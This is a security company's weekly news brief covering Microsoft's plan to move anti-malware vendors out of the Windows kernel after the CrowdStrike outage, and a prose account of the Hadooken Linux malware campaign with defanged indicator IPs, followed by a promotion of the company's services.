slider

Netizen: Monday Security Brief (9/16/2024)

Today’s Topics:

  • Windows 11 to Redefine How Anti-Malware Tools Operate After Costly Disruption
  • Hadooken Malware: A Powerful Combo Attack of Crypto Mining and DDoS on Linux Servers
  • How can Netizen help?

Windows 11 to Redefine How Anti-Malware Tools Operate After Costly Disruption

The fallout from a major IT disruption in July, caused by a faulty CrowdStrike update, has spurred Microsoft to rethink how anti-malware tools interact with the Windows kernel. With billions of dollars lost and systems worldwide affected, Microsoft is now focusing on making Windows 11 more resilient by reconfiguring how third-party security vendors operate.

In response, Microsoft plans to implement a fundamental change in how security software integrates with its operating system. Rather than allowing these tools to access the Windows kernel—an area where any malfunction can cause widespread system failures—the company is redesigning its platform so that third-party vendors can function outside of kernel mode. This effort, still in development, aims to safeguard against future disruptions like those that left CrowdStrike customers struggling during the July outage.

David Weston, Microsoft’s Vice President of Enterprise and OS Security, outlined the company’s approach following a summit held in Redmond. Weston said the goal is to boost both security and system stability without the inherent risks that come with kernel-level access. According to him, these changes are designed to better support security vendors while increasing the flexibility and reliability of Windows-based systems.

“Our focus is on ensuring solution providers can secure systems without needing kernel access,” Weston said. “With Windows 11, we can offer greater flexibility by moving vendors out of the kernel, while still maintaining the necessary level of protection.”

Microsoft’s push also includes reinforcing Safe Deployment Practices (SDP) for Endpoint Detection and Response (EDR) vendors. SDP calls for a phased, controlled release of updates, which would allow any potential problems to be identified before they reach a large user base. Weston highlighted how this could prevent incidents like the July CrowdStrike update, where a single faulty release caused significant downtime and disruptions for many businesses.

The summit addressed additional concerns, including the challenges of operating outside kernel mode and maintaining anti-tampering measures. Microsoft is particularly focused on ensuring the next generation of security tools doesn’t compromise system performance while remaining secure against cyber threats.

As part of this broader strategy, Microsoft is encouraging vendors to share more information about their products’ stability and compatibility, not only during development but after updates are released. This transparency is meant to foster greater cooperation between Microsoft and its security partners, ensuring a more streamlined response when incidents occur.

By overhauling how third-party tools interact with its system, Microsoft is clearly signaling a shift toward long-term reliability. The upcoming platform changes in Windows 11 could set a new precedent for how security software integrates with operating systems, minimizing the risk of widespread outages while keeping critical systems secure.


Hadooken Malware: A Powerful Combo Attack of Crypto Mining and DDoS on Linux Servers

A newly discovered malware campaign is targeting Linux environments by exploiting vulnerabilities in Oracle Weblogic servers to conduct cryptocurrency mining and spread botnet malware, according to cloud security researchers at Aqua Security.

The malware, dubbed Hadooken, is designed to infiltrate Linux-based systems and deliver a double payload: a cryptocurrency miner and a distributed denial-of-service (DDoS) botnet known as Tsunami (also called Kaiten). Tsunami has previously been linked to attacks on Jenkins and Weblogic services deployed within Kubernetes environments.

The attackers are using known vulnerabilities in Oracle Weblogic, as well as common misconfigurations, such as weak credentials, to gain an initial foothold in targeted systems. Once compromised, the system executes arbitrary code via two primary payloads—one written in Python and the other as a shell script. Both payloads are designed to retrieve Hadooken from remote servers located at “89.185.85[.]102” or “185.174.136[.]204.”

One notable aspect of the shell script version is its ability to comb through directories containing SSH data, such as user credentials and host information. Using this data, the malware spreads laterally across connected systems, further propagating Hadooken within the targeted infrastructure.

Once Hadooken is deployed, it drops both a cryptocurrency miner and the Tsunami botnet, the latter of which has been linked to attacks on Kubernetes environments. The malware ensures persistence by creating cron jobs that run the cryptocurrency miner periodically, keeping the malicious activity ongoing at irregular intervals to evade detection.

Hadooken employs several defense evasion tactics, including the use of Base64-encoded payloads and disguising malicious processes under seemingly benign names such as “bash” and “java.” This technique allows the malware to blend in with legitimate system processes, reducing the likelihood of detection by security tools. Additionally, Hadooken cleans up after itself by deleting any artifacts of its malicious activity post-execution.

Both IP addresses linked to the malware—89.185.85[.]102 and 185.174.136[.]204—are associated with the hosting company Aeza International LTD. Aeza is a bulletproof hosting provider, with operations based in Germany and links to data centers in Moscow and Frankfurt. This type of hosting service is notorious for sheltering cybercriminals, making it difficult to trace and shut down operations.

A report from cybersecurity firm Uptycs in February 2024 had previously linked Aeza to the 8220 Gang, another cybercrime group responsible for a cryptocurrency campaign exploiting vulnerabilities in Apache Log4j and Atlassian Confluence.

With its multi-faceted attack strategy—combining cryptocurrency mining, lateral movement, and DDoS botnet deployment—Hadooken poses a significant threat to organizations running vulnerable systems.

Security teams managing Linux systems, especially those leveraging Oracle Weblogic or Kubernetes, should remain vigilant and ensure all vulnerabilities are patched, misconfigurations are addressed, and monitoring tools are in place to detect any suspicious activity.


How Can Netizen Help?

Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 


Copyright © Netizen Corporation. All Rights Reserved.